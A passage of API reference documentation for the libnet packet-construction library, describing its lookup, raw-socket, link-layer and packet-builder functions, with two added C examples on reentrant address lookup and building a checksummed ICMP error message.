(possibly incurring DNS traffic) and return a canonical hostname, otherwise
if it is LIBNET_DONT_RESOLVE (or if the lookup fails), the function returns
a dotted-decimal ASCII string. This function is hopelessly non-reentrant
as it uses static data.
void libnet_host_lookup_r(u_long, u_short, u_char *);
RV on success: NA
RV on failure: NA
Reentrant: maybe
Arguments: 1 - network-byte ordered IP address
2 - flag to specify whether or not to look up canonical
hostnames (symbolic constant)
libnet_host_lookup_r() is the planned reentrant version of the above
function. As soon as reentrant network resolver libraries become
available, this function will likewise be reentrant. An additional
argument of a buffer to store the converted (or resolved) IP address is
supplied by the user.
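To make the static-data problem concrete, here is an added example (not
libnet's code) of the LIBNET_DONT_RESOLVE path of both functions: a lookup
that returns a pointer into static storage, and the _r form that writes into
a caller-supplied buffer. Holding two results from the static version at once
gives the same pointer twice, so both read as the second address; the
reentrant version keeps both. The addresses are constructed and handled as
byte arrays in network order, so no htonl()/ntohl() is involved.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Dotted-decimal rendering of a network-byte-ordered IPv4 address; the
 * bytes sit in memory in wire order, so they are read as bytes. */
static void ip_to_dotted(uint32_t addr_nbo, char *out, size_t outlen)
{
    unsigned char b[4];
    memcpy(b, &addr_nbo, 4);
    snprintf(out, outlen, "%d.%d.%d.%d", b[0], b[1], b[2], b[3]);
}

/* Non-reentrant variant: the result lives in static storage. */
const char *host_lookup(uint32_t addr_nbo)
{
    static char buf[16];               /* "255.255.255.255" plus NUL */
    ip_to_dotted(addr_nbo, buf, sizeof buf);
    return buf;
}

/* Reentrant variant: the caller supplies the buffer (16 bytes suffice). */
void host_lookup_r(uint32_t addr_nbo, char *out, size_t outlen)
{
    ip_to_dotted(addr_nbo, out, outlen);
}

/* Build a network-ordered address from its four octets (constructed input). */
static uint32_t nbo(unsigned char a, unsigned char b, unsigned char c, unsigned char d)
{
    unsigned char bytes[4] = {a, b, c, d};
    uint32_t v;
    memcpy(&v, bytes, 4);
    return v;
}

/* Two static lookups held at once: both now read as the second address. */
int static_lookup_clobbers(void)
{
    const char *src = host_lookup(nbo(10, 0, 0, 1));
    const char *dst = host_lookup(nbo(192, 168, 1, 2));
    return src == dst && strcmp(src, "192.168.1.2") == 0;
}

/* The same two lookups through the reentrant interface keep both results. */
int reentrant_lookup_keeps_both(void)
{
    char s[16], d[16];
    host_lookup_r(nbo(10, 0, 0, 1), s, sizeof s);
    host_lookup_r(nbo(192, 168, 1, 2), d, sizeof d);
    return strcmp(s, "10.0.0.1") == 0 && strcmp(d, "192.168.1.2") == 0;
}

int main(void)
{
    printf("static lookups clobber: %d, reentrant keeps both: %d\n",
           static_lookup_clobbers(), reentrant_lookup_keeps_both());
    return 0;
}
```

The same clobbering happens in any printf() that calls the static version
twice in one argument list, which is the usual way this bug shows up in
logging code around packet tools.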
u_long libnet_name_resolve(u_char *, u_short);
RV on success: network-byte ordered IP address
RV on failure: -1
Reentrant: yes
Arguments: 1 - human readable hostname
2 - flag to specify whether or not to look up canonical
hostnames (symbolic constant)
libnet_name_resolve() takes a NULL terminated ASCII string representation
of an IP address (dots and decimals or, if the usename flag is
LIBNET_RESOLVE, canonical hostname) and converts it into a network-ordered
(big-endian) unsigned long value.
u_long libnet_get_ipaddr(struct link_int *, const u_char *, const u_char *);
RV on success: requested IP address
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a link interface structure
2 - pointer to the device to query
3 - pointer to a buf to contain a possible error message
libnet_get_ipaddr() returns the IP address of a specified network device.
The function takes a pointer to a link layer interface structure, a
pointer to the network device name, and an empty buffer to be used in case
of error. Upon success the function returns the IP address of the
specified interface in network-byte order or 0 upon error (and errbuf will
contain a reason).
struct ether_addr *libnet_get_hwaddr(struct link_int *, const u_char *,
const u_char *);
RV on success: requested ethernet address (inside of struct ether_addr)
RV on failure: NULL
Reentrant: depends on architecture
Arguments: 1 - pointer to a link interface structure
2 - pointer to the device to query
3 - pointer to a buf to contain a possible error message
libnet_get_hwaddr() returns the hardware address of a specified network
device. At the time of this writing, only ethernet is supported.
The function takes a pointer to a link layer interface structure, a
pointer to the network device name, and an empty buffer to be used in case
of error. The function returns the MAC address of the specified interface
upon success or 0 upon error (and errbuf will contain a reason).
Packet Handling Functions
-------------------------
int libnet_open_raw_sock(int);
RV on success: opened socket file descriptor
RV on failure: -1
Reentrant: yes
Arguments: 1 - protocol number of the desired socket-type (symbolic
constant)
libnet_open_raw_sock() opens a raw IP socket of the specified protocol
type (supported types vary from system to system, but usually you'll want
to open an IPPROTO_RAW socket). The function also sets the IP_HDRINCL
socket option. Returned is the socket file descriptor or -1 on error. The
function can fail if either of the underlying calls to socket or setsockopt
fail. Checking errno will reveal the reason for the error.
int libnet_close_raw_sock(int);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - socket file descriptor to be closed
libnet_close_raw_sock() will close the referenced raw socket.
int libnet_select_device(struct sockaddr_in *, u_char **, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: no
Arguments: 1 - preallocated sockaddr_in structure pointer
2 - pointer to a char pointer containing the device
3 - pointer to a buf to contain a possible error message
libnet_select_device() will run through the list of interfaces and select
one for use (ignoring the loopback device). If the device argument
points to NULL (don't pass in a NULL pointer, the function expects a
pointer to a pointer, and C can't dereference a NULL pointer) it will
try to fill it in with the first non-loopback device it finds, otherwise,
it will try to open the specified device. If successful, 1 is returned
(and if device was NULL, it will now contain the device name which can
be used in libnet_*link*() type calls). The function can fail for a
variety of reasons, including socket system call failures, ioctl failures,
if no interfaces are found, etc. If such an error occurs, -1 is returned
and errbuf will contain a reason.
struct link_int *libnet_open_link_interface(char *, char *);
RV on success: filled in link-layer interface structure
RV on failure: NULL
Reentrant: yes
Arguments: 1 - pointer to a char containing the device to open
2 - pointer to a buf to contain a possible error message
libnet_open_link_interface() opens a low-level packet interface. This is
required in order to be able to inject link layer frames. Supplied is a
u_char pointer to the interface device name and a u_char pointer to an
error buffer. Returned is a filled-in link_int structure or NULL on
error (with the error buffer containing the reason). The function can
fail for a variety of reasons due to the fact that it is architecture
specific.
int libnet_close_link_interface(struct link_int *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to a link interface structure to be closed
libnet_close_link_interface() closes an opened low-level packet interface.
int libnet_write_ip(int, u_char *, int);
RV on success: number of bytes written
RV on failure: -1
Reentrant: Yes
Arguments: 1 - socket file descriptor
2 - pointer to the packet buffer containing an IP datagram
3 - total packet size
libnet_write_ip() writes an IP packet to the network. The first argument
is the socket created with a previous call to libnet_open_raw_sock, the
second is a pointer to a buffer containing a complete IP datagram, and
the third argument is the total packet size. The function returns the
number of bytes written upon success or -1 on error (with errno containing
the reason).
int libnet_write_link_layer(struct link_int *, const u_char *, u_char *, int);
RV on success: number of bytes written
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an opened link interface structure
2 - pointer to the network device
3 - pointer to the packet buffer
4 - total packet size
libnet_write_link_layer() writes a link-layer frame to the network. The
first argument is a pointer to a filled-in libnet_link_int structure,
the next is a pointer to the network device, the third is the raw packet
and the last is the packet size. Returned is the number of bytes written
or -1 on error.
int libnet_do_checksum(u_char *, int, int);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to the packet buffer
2 - protocol number of packet type (symbolic constant)
3 - total packet size
libnet_do_checksum() calculates the checksum for a packet. The first
argument is a pointer to a fully built IP packet. The second is the
transport protocol of the packet and the third is the packet length (not
including the IP header). The function calculates the checksum for the
transport protocol and fills it in at the appropriate header location
(this function should be called only after a complete packet has been
built).
Note that when using raw sockets the IP checksum is always computed by
the kernel and does not need to be done by the user. When using the link
layer interface the IP checksum must be explicitly computed (in this
case, the protocol would be of type IPPROTO_IP and the size would include
IP_H). The function returns 1 upon success or -1 if the protocol is of
an unsupported type. Currently supported are:
Value            Description
---------------------------
IPPROTO_TCP      TCP
IPPROTO_UDP      UDP
IPPROTO_ICMP     ICMP
IPPROTO_IGMP     IGMP
IPPROTO_IP       IP
int libnet_build_arp(u_short, u_short, u_short, u_short, u_short, u_char *,
u_char *, u_char *, u_char *, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - hardware address format (ARPHRD_ETHER)
2 - protocol address format
3 - length of the hardware address
4 - length of the protocol address
5 - ARP operation type (symbolic constant)
6 - sender's hardware address
7 - sender's protocol address
8 - target's hardware address
9 - target's protocol address
10 - pointer to packet payload
11 - packet payload size
12 - pointer to pre-allocated packet memory
libnet_build_arp() constructs an ARP (RARP) packet. At this point in the
library, the function only builds ethernet/ARP packets, but this will be
easy enough to change (whenever I get around to it). The first nine
arguments are standard ARP header arguments, with the last three being
standard libnet packet creation arguments. The ARP operation type
should be one of the following symbolic types:
Value              Description
-------------------------------
ARPOP_REQUEST      ARP request
ARPOP_REPLY        ARP reply
ARPOP_REVREQUEST   RARP request
ARPOP_REVREPLY     RARP reply
ARPOP_INVREQUEST   request to identify peer
ARPOP_INVREPLY     reply identifying peer
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ARP packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_dns(u_short, u_short, u_short, u_short, u_short, u_short,
const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet id
2 - control flags
3 - number of questions
4 - number of answer resource records
5 - number of authority resource records
6 - number of additional resource records
7 - pointer to packet payload
8 - packet payload size
9 - pointer to pre-allocated packet memory
libnet_build_dns() constructs a DNS packet. The static DNS fields are
included as the first six arguments, but the optional variable length
fields must be included with the payload interface.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire DNS packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_ethernet(u_char *, u_char *, u_short, const u_char *, int,
u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to the destination address (string)
2 - pointer to the source address (string)
3 - ethernet packet type (symbolic constant)
4 - pointer to packet payload
5 - packet payload size
6 - pointer to pre-allocated packet memory
libnet_build_ethernet() constructs an ethernet packet. The destination
address and source address arguments are expected to be arrays of
unsigned character bytes. The packet type should be one of the
following:
Value                Description
-------------------------------
ETHERTYPE_PUP        PUP protocol
ETHERTYPE_IP         IP protocol
ETHERTYPE_ARP        ARP protocol
ETHERTYPE_REVARP     Reverse ARP protocol
ETHERTYPE_VLAN       IEEE VLAN tagging
ETHERTYPE_LOOPBACK   Used to test interfaces
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ethernet
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_echo(u_char, u_char, u_short, u_short, const u_char *,
int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - packet id
4 - packet sequence number
5 - pointer to packet payload
6 - packet payload size
7 - pointer to pre-allocated packet memory
libnet_build_icmp_echo() constructs an ICMP_ECHO / ICMP_ECHOREPLY packet.
The packet type should be ICMP_ECHOREPLY or ICMP_ECHO and the code should
be 0.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_ECHO
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_mask(u_char, u_char, u_short, u_short, u_long,
const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - packet id
4 - packet sequence number
5 - IP netmask
6 - pointer to packet payload
7 - packet payload size
8 - pointer to pre-allocated packet memory
libnet_build_icmp_mask() constructs an ICMP_MASKREQ / ICMP_MASKREPLY
packet. The packet type should be either ICMP_MASKREQ or ICMP_MASKREPLY
and the code should be 0. The IP netmask argument should be a 32-bit
network-byte ordered subnet mask.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_MASK
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_unreach(u_char, u_char, u_short, u_char, u_short,
u_short, u_char, u_char, u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - original IP length
4 - original IP TOS
5 - original IP id
6 - original IP fragmentation bits
7 - original IP time to live
8 - original IP protocol
9 - original IP source address
10 - original IP destination address
11 - pointer to original IP payload
12 - original IP payload size
13 - pointer to pre-allocated packet memory
libnet_build_icmp_unreach() constructs an ICMP_UNREACH packet. The 3rd
through the 12th arguments are used to build the IP header of the original
packet that caused the error message (the ICMP unreachable). The packet
type should be ICMP_UNREACH and the code should be one of the following:
Value                          Description
-------------------------------------------
ICMP_UNREACH_NET               network is unreachable
ICMP_UNREACH_HOST              host is unreachable
ICMP_UNREACH_PROTOCOL          protocol is unreachable
ICMP_UNREACH_PORT              port is unreachable
ICMP_UNREACH_NEEDFRAG          fragmentation required but DF bit was set
ICMP_UNREACH_SRCFAIL           source routing failed
ICMP_UNREACH_NET_UNKNOWN       network is unknown
ICMP_UNREACH_HOST_UNKNOWN      host is unknown
ICMP_UNREACH_ISOLATED          host / network is isolated
ICMP_UNREACH_NET_PROHIB        network is prohibited
ICMP_UNREACH_HOST_PROHIB       host is prohibited
ICMP_UNREACH_TOSNET            IP TOS and network
ICMP_UNREACH_TOSHOST           IP TOS and host
ICMP_UNREACH_FILTER_PROHIB     prohibitive filtering
ICMP_UNREACH_HOST_PRECEDENCE   host precedence
ICMP_UNREACH_PRECEDENCE_CUTOFF host precedence cut-off
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_UNREACH
packet).
The only way this (or any libnet_build) function will return an error is if
the memory which is supposed to be pre-allocated points to NULL.
int libnet_build_icmp_timeexceed(u_char, u_char, u_short, u_char, u_short,
u_short, u_char, u_char, u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - original IP length
4 - original IP TOS
5 - original IP id
6 - original IP fragmentation bits
7 - original IP time to live
8 - original IP protocol
9 - original IP source address
10 - original IP destination address
11 - pointer to original IP payload
12 - original IP payload size
13 - pointer to pre-allocated packet memory
libnet_build_icmp_timeexceed() constructs an ICMP_TIMXCEED packet. This
function is identical to libnet_build_icmp_unreach with the exception of
the packet type and code. The packet type should be either
ICMP_TIMXCEED_INTRANS for packets that expired in transit (TTL expired) or
ICMP_TIMXCEED_REASS for packets that expired in the fragmentation
reassembly queue.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_TIMXCEED
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
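What both of these functions lay down in the pre-allocated buffer, as an added example that is not libnet code: the 8-byte ICMP error header, the original datagram's IP header rebuilt from arguments 3 through 10, then the original IP payload, with the ICMP checksum computed over the whole message. The same builder serves time-exceeded messages (type ICMP_TIMXCEED), since only the type and code differ; the function and macro names are this example's own and the sample UDP header is constructed.

```c
/* Added example, not libnet code: serialize an ICMP error message from the
 * same argument list the page gives for libnet_build_icmp_unreach() and
 * libnet_build_icmp_timeexceed() into a caller-supplied buffer, then check
 * it the way a receiver would. All names here are this example's own. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ICMP_UNREACH           3   /* RFC 792 type and code values */
#define ICMP_UNREACH_PORT      3
#define ICMP_TIMXCEED         11
#define ICMP_TIMXCEED_INTRANS  0
#define ICMP_ERR_H             8   /* type, code, checksum, 4 unused bytes */
#define IP_HDR_H              20   /* echoed IP header, no options */

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xffff); }

/* One's-complement Internet checksum (RFC 1071) over len bytes. */
uint16_t inet_cksum(const uint8_t *d, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, d += 2)
        sum += (uint32_t)((d[0] << 8) | d[1]);
    if (len)
        sum += (uint32_t)(d[0] << 8);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Arguments follow the page's order: type, code, the original datagram's IP
 * header fields (length, TOS, id, fragmentation bits, TTL, protocol, source,
 * destination), the original IP payload (normally its first 8 bytes) and the
 * output buffer. Returns bytes written, or -1 if buf is NULL or too small.
 * Per the page libnet checks only the NULL case and leaves sizing to the
 * caller; the buf_len check here closes that gap. */
int icmp_error_build(uint8_t type, uint8_t code,
                     uint16_t ip_len, uint8_t ip_tos, uint16_t ip_id,
                     uint16_t ip_frag, uint8_t ip_ttl, uint8_t ip_proto,
                     uint32_t ip_src, uint32_t ip_dst,
                     const uint8_t *payload, size_t payload_len,
                     uint8_t *buf, size_t buf_len)
{
    size_t total = ICMP_ERR_H + IP_HDR_H + payload_len;
    uint8_t *ip;

    if (buf == NULL || buf_len < total)
        return -1;
    memset(buf, 0, total);
    buf[0] = type;
    buf[1] = code;                 /* bytes 2-3 checksum, 4-7 unused: zero */

    ip = buf + ICMP_ERR_H;         /* echo the offending datagram's header */
    ip[0] = 0x45;                  /* IPv4, 5-word header */
    ip[1] = ip_tos;
    put16(ip + 2, ip_len);
    put16(ip + 4, ip_id);
    put16(ip + 6, ip_frag);        /* IP_DF / IP_MF bits plus offset */
    ip[8] = ip_ttl;
    ip[9] = ip_proto;
    put32(ip + 12, ip_src);
    put32(ip + 16, ip_dst);
    put16(ip + 10, inet_cksum(ip, IP_HDR_H));
    if (payload_len)
        memcpy(ip + IP_HDR_H, payload, payload_len);

    put16(buf + 2, inet_cksum(buf, total));   /* ICMP checksum over it all */
    return (int)total;
}

/* Receiver-side check: minimum RFC 792 length and both checksums verify
 * (with a correct checksum field the sum over the covered bytes is zero).
 * Returns 1 if valid, 0 otherwise. */
int icmp_error_valid(const uint8_t *buf, size_t len)
{
    if (buf == NULL || len < ICMP_ERR_H + IP_HDR_H)
        return 0;
    if (inet_cksum(buf, len) != 0)
        return 0;
    return inet_cksum(buf + ICMP_ERR_H, IP_HDR_H) == 0;
}

/* Constructed sample (every value made up): a port-unreachable answering a
 * UDP datagram 10.0.0.1:12345 -> 10.0.0.2:53 that carried the DF bit. */
int sample_port_unreach(uint8_t *buf, size_t buf_len)
{
    static const uint8_t udp_hdr[8] = {0x30, 0x39, 0x00, 0x35, 0x00, 0x1c, 0x00, 0x00};
    return icmp_error_build(ICMP_UNREACH, ICMP_UNREACH_PORT,
                            28, 0, 0x1234, 0x4000, 64, 17,
                            0x0a000001, 0x0a000002, udp_hdr, sizeof udp_hdr,
                            buf, buf_len);
}
```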
int libnet_build_icmp_redirect(u_char, u_char, u_long, u_short, u_char,
u_short, u_short, u_char, u_char, u_long, u_long, const u_char *, int,
u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - IP address of the gateway
4 - original IP length
5 - original IP TOS
6 - original IP id
7 - original IP fragmentation bits
8 - original IP time to live
9 - original IP protocol
10 - original IP source address
11 - original IP destination address
12 - pointer to original IP payload
13 - original IP payload size
14 - pointer to pre-allocated packet memory
libnet_build_icmp_redirect() constructs an ICMP_REDIRECT packet. This
function is similar to libnet_build_icmp_unreach, the differences being the
type and code and the addition of an argument to hold the IP address of the
gateway that should be used (hence the redirect). The packet type should be
ICMP_REDIRECT and the code should be one of the following:
Value                 Description
-----------------------------------
ICMP_REDIRECT_NET     redirect for network
ICMP_REDIRECT_HOST    redirect for host
ICMP_REDIRECT_TOSNET  redirect for type of service and network
ICMP_REDIRECT_TOSHOST redirect for type of service and host
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_REDIRECT
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
int libnet_build_icmp_timestamp(u_char, u_char, u_short, u_short, n_time,
n_time, n_time, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type (symbolic constant)
2 - packet code (symbolic constant)
3 - packet id
4 - packet sequence number
5 - originate timestamp
6 - receive timestamp
7 - transmit timestamp
8 - pointer to packet payload
9 - packet payload size
10 - pointer to pre-allocated packet memory
libnet_build_icmp_timestamp() constructs an ICMP_TSTAMP / ICMP_TSTAMPREPLY
packet. The packet type should be ICMP_TSTAMP or ICMP_TSTAMPREPLY and the
code should be 0.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire ICMP_TSTAMP
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
int libnet_build_igmp(u_char type, u_char code, u_long ip, const u_char *,
int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet type
2 - packet code
3 - IP address
4 - pointer to packet payload
5 - packet payload size
6 - pointer to pre-allocated packet memory
libnet_build_igmp() constructs an IGMP packet. The packet type should be
one of the following:
Value                       Description
---------------------------------------
IGMP_MEMBERSHIP_QUERY       membership query
IGMP_V1_MEMBERSHIP_REPORT   version 1 membership report
IGMP_V2_MEMBERSHIP_REPORT   version 2 membership report
IGMP_LEAVE_GROUP            leave-group message
The code, which is a routing sub-message, should probably be left at 0,
unless you know what you're doing.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire IGMP
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer which points to memory which is supposed to be pre-allocated
points to NULL.
int libnet_build_ip(u_short, u_char, u_short, u_short, u_char, u_char,
u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - packet length (not including the IP header)
2 - type of service (symbolic constant)
3 - packet id
4 - fragmentation bits (symbolic constant) / offset
5 - time to live
6 - protocol (symbolic constant)
7 - source address
8 - destination address
9 - pointer to packet payload
10 - packet payload size
11 - pointer to pre-allocated packet memory
libnet_build_ip() constructs the mighty IP packet. The fragmentation field
may be 0 or contain some combination of the following:
Value   Description
-------------------
IP_DF   Don't fragment this datagram (this is only valid when alone)
IP_MF   More fragments on the way (OR'd together with an offset value)
The IP_OFFMASK is used to retrieve the offset from the fragmentation field.
IP packets may be no larger than IP_MAXPACKET bytes.
The source and destination addresses need to be in network-byte order.
The payload interface should only be used to construct an arbitrary or
non-supported type IP datagram. To construct a TCP, UDP, or similar
type packet, use the relevant libnet_build function.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire IP
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to the memory which is supposed to be pre-allocated points
to NULL.
int libnet_build_rip(u_char, u_char, u_short, u_short, u_short, u_long,
u_long, u_long, u_long, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - command (symbolic constant)
2 - version (symbolic constant)
3 - routing domain (or zero)
4 - address family
5 - route tag (or zero)
6 - IP address
7 - netmask (or zero)
8 - next hop IP address (or zero)
9 - metric
10 - pointer to packet payload
11 - packet payload size
12 - pointer to pre-allocated packet memory
libnet_build_rip() constructs a RIP packet. Depending on the version of
RIP you are using, packet fields are slightly different. The following
chart highlights these differences:
Argument   Version 1        Version 2
-----------------------------------------
first      command          command
second     RIPVER_1         RIPVER_2
third      zero             routing domain
fourth     address family   address family
fifth      zero             route tag
sixth      IP address       IP address
seventh    zero             subnet mask
eighth     zero             next hop IP
ninth      metric           metric
The RIP commands should be one of the following:
Value              Description
-------------------------------
RIPCMD_REQUEST     RIP request
RIPCMD_RESPONSE    RIP response
RIPCMD_TRACEON     RIP tracing on
RIPCMD_TRACEOFF    RIP tracing off
RIPCMD_POLL        RIP polling
RIPCMD_POLLENTRY
RIPCMD_MAX
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire RIP
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer that points to memory which is supposed to be pre-allocated
points to NULL.
int libnet_build_tcp(u_short, u_short, u_long, u_long, u_char, u_short,
u_short, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - source port
2 - destination port
3 - sequence number
4 - acknowledgement number
5 - control flags (symbolic constant)
6 - window size
7 - urgent pointer
8 - pointer to packet payload
9 - packet payload size
10 - pointer to pre-allocated packet memory
libnet_build_tcp() constructs a TCP packet. The control flags should be
one or more of the following (OR'd together if need be):
Value   Description
-----------------------
TH_URG  urgent data is present
TH_ACK  acknowledgement number field should be checked
TH_PSH  push this data to the application as soon as possible
TH_RST  reset the referenced connection
TH_SYN  synchronize sequence numbers
TH_FIN  finished sending data (sender)
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire TCP
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to memory which is supposed to be pre-allocated points to NULL.
int libnet_build_udp(u_short, u_short, const u_char *, int, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - source port
2 - destination port
3 - pointer to packet payload
4 - packet payload size
5 - pointer to pre-allocated packet memory
libnet_build_udp() constructs a UDP packet. Please remember that UDP
checksums are considered mandatory by the host requirements RFC.
All libnet packet creation functions contain the same three terminal
arguments: a pointer to an optional payload (or NULL if no payload is to
be included), the size of the payload in bytes (or 0 if no payload is
included) and most importantly, a pointer to a pre-allocated block of
memory (which must be large enough to accommodate the entire UDP
packet).
The only way this (or any libnet_build) function will return an error is if
the pointer to memory which is supposed to be pre-allocated points to NULL.
int libnet_insert_ipo(struct ipoption *opt, u_char opt_len, u_char *buf);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an IP options structure (filled in)
2 - length of the options
3 - pointer to a complete IP datagram
libnet_insert_ipo() inserts IP options into a pre-built IP packet.
Supplied is a pointer to an ip options structure, the size of this options
list, and a pointer to the pre-built packet. The options list should be
constructed as they will appear on the wire, as they are simply inserted
into the packet at the appropriate location.
The function returns -1 if the options would result in a packet too large
(greater than 65535 bytes), or if the packet buffer is NULL. It is an
unchecked runtime error for the user to have not allocated enough heap
memory for the IP packet plus the IP options.
int libnet_insert_tcpo(struct tcpoption *, u_char, u_char *);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an TCP options structure (filled in)
2 - length of the options
3 - pointer to a complete TCP packet
libnet_insert_tcpo() inserts TCP options into a pre-built IP/TCP packet.
Supplied is a pointer to a tcp options structure, the size of this options
list, and a pointer to the pre-built packet. The options list should be
constructed as they will appear on the wire, as they are simply inserted
into the packet at the appropriate location.
The function returns -1 if the options would result in a packet too large
(greater than 65535 bytes), if the packet isn't an IP/TCP packet, if the
options list is longer than 20 bytes, or if the packet buffer is NULL. It
is an unchecked runtime error for the user to have not allocated enough
heap memory for the IP/TCP packet plus the TCP options.
Support Functions
-----------------
int libnet_seed_prand();
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: NA
libnet_seed_prand() seeds the pseudo-random number generator. The function
is basically a wrapper to srandom. It makes a call to gettimeofday to get
entropy. It can return -1 if the call to gettimeofday fails (check errno).
It otherwise returns 1.
u_long libnet_get_prand(int);
RV on success: the pseudo-random number
RV on failure: NA
Reentrant: yes
Arguments: 1 - maximum size of pseudo-random number desired (symbolic
constant)
libnet_get_prand() generates a pseudo-random number. The range of the
returned number is controlled by the function's only argument:
Value   Description
-------------------
PR2     0 - 1
PR8     0 - 255
PR16    0 - 32767
PRu16   0 - 65535
PR32    0 - 2147483647
PRu32   0 - 4294967295
The function does not fail.
void libnet_hex_dump(u_char *buf, int len, int swap, FILE *stream);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - packet to dump
2 - packet length
